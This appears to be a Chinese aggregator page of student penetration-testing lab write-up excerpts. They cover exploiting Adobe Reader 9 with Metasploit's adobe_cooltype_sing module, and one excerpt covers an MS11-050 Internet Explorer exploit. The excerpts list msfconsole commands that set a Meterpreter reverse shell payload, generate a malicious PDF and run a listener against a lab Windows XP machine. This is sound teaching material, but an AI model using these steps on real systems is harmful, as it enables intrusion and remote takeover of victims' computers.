Adobe9阅读器渗透攻击——20145301】的更多相关文章

Adobe9阅读器渗透攻击 实验步骤: 在kali终端中开启msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用. 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷. 输入命令show options显示我们需要在攻击前需要设置的属性 输入命令 输入exploit,生成pdf文件(在隐藏文件夹中/.msf/local/5301.pdf)…
Adobe阅读器渗透攻击 实验前准备 1.两台虚拟机,其中一台为kali,一台为windows xp sp3(老师给的xp虚拟机winxpAttaker,密码:mima1234). 2.设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通. 3.kali下打开显示隐藏文件,如下图,先打开主文件夹,在右上角打开如下图所示位置: 实验步骤: 1.在kali终端中开启msfconsole. 2.输入命令use exploit/windows/fileformat/adobe_cooltype_si…
20145319 <网络渗透>Adobe阅读器渗透攻击 一 实验内容 初步掌握平台matesploit的使用 有了初步完成渗透操作的思路 本次攻击对象:windows xp sp3  Adobe 9.3 二 实验步骤 按照我们平常使用matesploit的思路,进入msfconsole控制台之后,首先要确定我们应该使用怎样的攻击模块来完成渗透 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模…
20145211<网络渗透>Adobe阅读器渗透攻击 实验准备 1.用了一个kali,一个English Winxp3,并保证能相互ping通 2.开启显示隐藏文件 实验步骤: 1.开启msfconsole. 2.使用漏洞use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用. 3.使用攻击载荷 windows/meterpreter/reverse_tcp设置攻击有效载荷. 4.查看参数,并配置,生成hzy.pdf,将pdf…
两台虚拟机: kali ip:192.168.96.130 windows xp sp3 ip:192.168.96.133 1.kali下打开显示隐藏文件 2.在kali终端中开启msfconsole. 3.进入该漏洞模块并设置攻击有效载荷 4.查看需要需要设置的数据,并设置相应的参数 5.查看设置的参数信息 6.打开exploit生成渗透攻击的pdf文件 7.将渗透文件发送到靶机,使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块. 8.使…
20145335郝昊<网络攻防>Exp4 Adobe阅读器漏洞攻击 实验内容 初步掌握平台matesploit的使用 有了初步完成渗透操作的思路 本次攻击对象为:windows xp sp3 / Adobe 9.3 主机为kali的ip地址为:192.168.199.220.靶机windows xp 的ip地址为:192.168.199.137 实验步骤 使用命令msfconsole进入控制台 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_co…
20145322 Exp5 Adobe阅读器漏洞攻击 实验过程 IP:kali:192.168.1.102 windowsxp :192.168.1.119 msfconsole进入控制台 使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块 设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http 使用命令show options来确定需要修改的参数. 使用命令exp…
20145333茹翔 Exp5 Adobe阅读器漏洞攻击 实验过程 主机为kali的ip地址为:192.168.1.111.靶机windows xp 的ip地址为:192.168.1.110 使用命令msfconsole进入控制台 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为 use windows/fileformat/adobe_cooltype_…
1.浏览器渗透攻击实例——MS11-050安全漏洞 示例代码如下 msf > use windows/browser/ms11_050_mshtml_cobjectelement msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > info Name: MS11-050 IE mshtml!CObjectElement Use After Free Module: exploit/windows/browser/ms11_…
实验环境:Kali 2.0+Windows XP sp3+Adobe Reader 9.0.0 类别:缓冲区溢出 描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出. 参考资料:<Metasploit魔鬼训练营>p286-p298 Adobe漏洞渗透过程: kali上使用windows/fileformat/adobe_cooltype_sing,载荷为windows/meterpreter/reverse_http…